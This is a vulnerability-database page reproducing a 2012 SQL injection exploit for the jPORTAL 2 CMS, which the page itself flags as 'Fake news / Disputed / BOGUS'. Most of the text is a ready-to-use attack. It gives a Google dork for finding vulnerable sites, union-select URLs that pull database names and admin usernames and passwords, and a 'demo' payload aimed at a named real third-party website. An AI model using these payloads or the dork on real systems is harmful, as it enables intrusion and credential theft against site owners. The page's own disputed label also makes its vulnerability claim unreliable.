WARNING! Fake news / Disputed / BOGUS

jPORTAL 2 SQL Injection

2012.01.02
Credit: H4ckCity
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################################################ # Exploit Title: jPORTAL 2 SQL Injection Vulnerabilitiy # Google Dork: "powered by jPORTAL 2" # Date: 8/12/2011 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Software Link: http://jportal2.com/ # Version: All Version # Security Risk::High # Tested on: GNU/Linux Ubuntu - Windows Server ############################################################################ # Exploit: # # http://target.com/comment.php?what=news&id=[sqli] # # For get The DB: # # http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select distinct # concat(unhex(Hex(cast(schema_name as char)))) from `information_schema`.schemata limit # 1,1),null,null,null,null,null,null-- # # For get The Username & Password : # # http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select concat # (unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast(admins.pass as char)))) from # `target_database`.admins Order by nick limit 0,1) ,null,null,null,null,null,null-- # # Demo: # # http://www.lotnisko.szprotawa.org.pl/comment.php?what=news&id=3 union all # select null,null,(select concat(unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast # (admins.pass as char)))) from `tmnet_lotnisko`.admins Order by nick limit 0,1) # ,null,null,null,null,null,null-- # ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # nitrojen90-hellboy-K0242-kingcope-Mr.M4st3r , ... ############################################################################ GreetZ : All H4ckCity Member ############################################################################

References:

http://jportal2.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top